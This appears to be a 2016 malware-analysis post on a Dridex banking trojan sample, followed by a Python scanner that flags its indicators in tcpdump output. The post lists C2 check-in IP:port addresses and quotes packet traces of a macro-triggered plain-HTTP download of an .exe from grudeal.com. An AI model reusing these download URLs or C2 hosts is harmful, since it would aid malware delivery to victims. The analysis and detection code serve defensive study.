Malware Sample Dridex Banking Trojan .DOC Macro Download .EXE & C2 PCAP Traffic Sample

January 29, 2016

Dridex PCAP Sample #2: dridex2.pcap

This is what happens when you open the .doc file: a macro runs and downloads a malicious executable:

[Screenshot: macro_dridex]

[Screenshot: macro_dridex2]

The sample checks in and downloads data from:

https://119.160.223.115:1143
https://151.80.142.33:1743
https://202.69.40.173:243
https://216.117.130.191:1143

After checking in, these C2 sites were used:


These Dridex configuration values were also found:

<botnet>220</botnet>
<version>196773</version>

Sample from the attached pcap network traffic:

2016-01-27 13:27:52.710508 IP 192.168.56.16.52784 > 8.8.8.8.53: 19471+ A? grudeal.com. (29)
2016-01-27 13:27:52.735341 IP 8.8.8.8.53 > 192.168.56.16.52784: 19471 1/0/0 A 192.254.234.133 (45)
2016-01-27 13:27:52.768156 IP 192.168.56.16.49162 > 192.254.234.133.80: Flags [S], seq 3813713268, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0

2016-01-27 13:27:52.808316 IP 192.168.56.16.49162 > 192.254.234.133.80: Flags [P.], seq 1:336, ack 1, win 16425, length 335: HTTP: GET /54t4f4f/7u65j5hg.exe HTTP/1.1
GET /54t4f4f/7u65j5hg.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: grudeal.com
Connection: Keep-Alive
2016-01-27 13:27:52.844333 IP 192.254.234.133.80 > 192.168.56.16.49162: Flags [.], ack 336, win 237, length 0
2016-01-27 13:27:52.849601 IP 192.254.234.133.80 > 192.168.56.16.49162: Flags [.], seq 1:1461, ack 336, win 237, length 1460: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Wed, 27 Jan 2016 18:27:52 GMT
Content-Type: application/x-msdownload
Content-Length: 266752
Connection: keep-alive
Last-Modified: Wed, 27 Jan 2016 13:19:30 GMT
Accept-Ranges: bytes

MZ ... This program cannot be run in DOS mode.

2016-01-27 13:27:53.973364 IP 192.254.234.133.80 > 192.168.56.16.49162: Flags [.], seq 204401:205861, ack 336, win 237, length 1460: HTTP
2016-01-27 13:27:54.012619 IP 192.168.56.16.49163 > 65.52.108.163.443: Flags [P.], seq 1:122, ack 1, win 16560, length 121
2016-01-27 13:27:54.051914 IP 65.52.108.163.443 > 192.168.56.16.49163: Flags [.], seq 1:1461, ack 122, win 513, length 1460
2016-01-27 13:27:54.051921 IP 65.52.108.163.443 > 192.168.56.16.49163: Flags [.], seq 1461:2921, ack 122, win 513, length 1460
2016-01-27 13:27:54.051928 IP 65.52.108.163.443 > 192.168.56.16.49163: Flags [P.], seq 2921:3629, ack 122, win 513, length 708
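As an added example (not part of the original post or the sample), a small Python scanner over tcpdump summary lines of the kind quoted above: it ties the DNS answer for grudeal.com to the later plain-HTTP .exe fetch, flags the application/x-msdownload response, and flags any connection to one of the check-in IP:port pairs listed earlier. The capture excerpt is constructed from the lines shown in the post, and the final check-in packet is constructed for the test.

```python
import re

# Constructed excerpt of the capture lines quoted in the post, plus one
# constructed packet to a listed check-in address (not in the post's dump).
SAMPLE_TCPDUMP = """\
2016-01-27 13:27:52.710508 IP 192.168.56.16.52784 > 8.8.8.8.53: 19471+ A? grudeal.com. (29)
2016-01-27 13:27:52.735341 IP 8.8.8.8.53 > 192.168.56.16.52784: 19471 1/0/0 A 192.254.234.133 (45)
2016-01-27 13:27:52.808316 IP 192.168.56.16.49162 > 192.254.234.133.80: Flags [P.], seq 1:336, ack 1, win 16425, length 335: HTTP: GET /54t4f4f/7u65j5hg.exe HTTP/1.1
Host: grudeal.com
2016-01-27 13:27:52.849601 IP 192.254.234.133.80 > 192.168.56.16.49162: Flags [.], seq 1:1461, ack 336, win 237, length 1460: HTTP: HTTP/1.1 200 OK
Content-Type: application/x-msdownload
2016-01-27 13:27:54.012619 IP 192.168.56.16.49163 > 65.52.108.163.443: Flags [P.], seq 1:122, ack 1, win 16560, length 121
2016-01-27 13:27:55.000000 IP 192.168.56.16.49164 > 119.160.223.115.1143: Flags [S], seq 1, win 8192, length 0
"""

# Check-in addresses (IP, port) listed in the post.
DRIDEX_CHECKIN = {("119.160.223.115", 1143), ("151.80.142.33", 1743),
                  ("202.69.40.173", 243), ("216.117.130.191", 1143)}

PKT = re.compile(r"^\S+ \S+ IP (\S+)\.(\d+) > (\S+)\.(\d+): (.*)$")
DNS_QUERY = re.compile(r"(\d+)\+ A\? (\S+)\.")
DNS_ANSWER = re.compile(r"(\d+) 1/0/0 A (\d+\.\d+\.\d+\.\d+)")
GET_EXE = re.compile(r"HTTP: GET (\S+\.exe) HTTP/")

def scan(lines):
    """Return a list of alert strings for the given tcpdump summary lines."""
    alerts, pending, resolved, http_peer = [], {}, {}, None
    for line in lines:
        m = PKT.match(line)
        if not m:
            # Not a packet summary: an HTTP header line printed after one.
            if http_peer and "application/x-msdownload" in line.lower():
                client, server = http_peer
                alerts.append(f"PE download to {client} from {resolved.get(server, server)}")
            continue
        src, dst, dport, rest = m.group(1), m.group(3), int(m.group(4)), m.group(5)
        if q := DNS_QUERY.search(rest):          # remember query id -> name
            pending[q.group(1)] = q.group(2)
        if (a := DNS_ANSWER.search(rest)) and a.group(1) in pending:
            resolved[a.group(2)] = pending.pop(a.group(1))  # answered ip -> name
        if g := GET_EXE.search(rest):            # plain-HTTP request for an .exe
            http_peer = (src, dst)
            alerts.append(f"exe request {g.group(1)} to {resolved.get(dst, dst)}")
        if (dst, dport) in DRIDEX_CHECKIN:       # connection to a listed check-in
            alerts.append(f"Dridex check-in from {src} to {dst}:{dport}")
    return alerts

def scan_sample():
    return scan(SAMPLE_TCPDUMP.splitlines())
```

The scanner only understands tcpdump's one-line summaries and the header lines that follow them; run it over `tcpdump -A -r dridex2.pcap` output to reproduce the three alerts on the post's capture.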
